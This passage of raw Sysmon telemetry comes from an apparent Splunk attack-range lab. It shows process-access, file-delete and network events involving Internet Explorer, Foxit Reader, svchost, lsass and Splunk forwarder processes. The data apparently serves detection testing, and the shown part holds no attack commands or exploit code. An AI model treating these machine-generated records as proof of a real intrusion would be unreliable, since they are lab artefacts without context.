Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\IEFRAME.dll+9886c|C:\Windows\SYSTEM32\IEFRAME.dll+9ecff|C:\Windows\SYSTEM32\IEFRAME.dll+9e086|C:\Windows\SYSTEM32\IEFRAME.dll+64998|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\IEFRAME.dll+a584c|C:\Windows\SYSTEM32\IEFRAME.dll+cf83b|C:\Windows\SYSTEM32\IEFRAME.dll+f94d8|C:\Windows\SYSTEM32\IEFRAME.dll+f93e0|C:\Windows\SYSTEM32\IEFRAME.dll+c89bd|C:\Windows\SYSTEM32\IEFRAME.dll+2a7b76|C:\Windows\SYSTEM32\IEFRAME.dll+152ad4|C:\Windows\SYSTEM32\IEFRAME.dll+da62d|C:\Windows\SYSTEM32\IEFRAME.dll+152b5f|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.150{FE4C2B44-E474-63C7-2706-00000000AF02}704ATTACKRANGE\AdministratorC:\Program Files\Internet Explorer\iexplore.exeC:\Users\ADMINI~1\AppData\Local\Temp\~DF345660DADFC3015C.TMPMD5=9C33B081EDB14531BFF4220705A92F65,SHA256=53511D3F312B0EAAD1158EC4D2C01D98956BDA5A80823BC3469E3ABC60C0396F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.150{FE4C2B44-E474-63C7-2706-00000000AF02}704ATTACKRANGE\AdministratorC:\Program Files\Internet Explorer\iexplore.exeC:\Users\ADMINI~1\AppData\Local\Temp\~DF532BC0BC7EB41BD4.TMPMD5=26EEE70AB28C966728623DC3732F1E40,SHA256=FC31D21DA527480C78FCB89AA9596AD0D3209044DF896B2E1158674ABEA68033,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.150{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eb73|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+32717|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.150{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eade|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+32717|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.150{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+32717|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.150{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\shcore.dll+32717|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.117{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.117{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.117{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.117{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016570Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:24.257{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A79FF6AACFF610C64E2B1B385DF55FC,SHA256=5FB790C6C2A9507F093D06AF1F11C0048A0D8D2857D88324B0D7907B5DC7D5F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.070{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.070{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:25.594{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:25.188{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ED44486F5A74E245F443FBB21EFB301,SHA256=4CBA26E4EF52CD613D04BAD3FBD5CA5D6AC1FC10D14DF6483B12503412618783,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016575Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:25.667{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016574Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:25.667{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016573Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:25.667{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016572Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:25.653{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016571Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:25.333{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D1914F75E330D7FED0901A6915FE309,SHA256=91C74AA31EC9B591ECBED5EA33B8AE47B4F847EF9AE6F9E8F3B78516548F7B0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000042071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:24.574{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56309-false10.0.1.12-8000- 23542300x800000000000000042070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:26.541{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0D9140FFFCD7CBD25F7175BDA8CDABF3,SHA256=865FD493DE97A458DD1DDFAF80461F80F3030F1F2F57C7D01120E0F8D50523EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:26.276{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=817EC4ED546FE1CFB02D01341899D1F5,SHA256=FD807D7695550A8C043B05798C9DB95490D192BB941A8C47F81B289CE4EA378D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016576Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:26.417{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40CC5349C6BE030514D17DE07026F4C8,SHA256=396DB745E5790BDA86ACFC78622AEF412DB66F73FB4736339B6D8C662AB94845,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000042073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:27.597{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:27.379{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFEF1B10378D1C4FA94954BBCF6EEC6B,SHA256=DC6CA613C82877BDB057230FD7F45130059D299BE3FB23D6888CFBC4220CA199,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016578Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:26.052{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50102-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016577Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:27.495{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E0CEC72C64433FC60AB840A7FAAF192,SHA256=E6D225DB77A3F0812D34D7AE4E9EBE81DD73D8C61EB9F89A3321417B0851DE85,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000042075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:27.061{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56310-false10.0.1.12-8089- 23542300x800000000000000042074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:28.462{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBCEEF92FB8F5FA801FF9F0187F6EE38,SHA256=F8525DE8C5A2DB0AD55D5BFD3995C3BC6C784A5058A5A071D48D9FC0CE2DDD76,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016579Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:28.579{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D2D59DFBA712DFD7C6C91CB76BEA820,SHA256=4EB1F6E91B10893C9DA8A6FC17AB9567A85CCB000A2A667482FE82AF0B8EE003,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.926{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E485-63C7-2A06-00000000AF02}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.926{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.926{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.926{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C: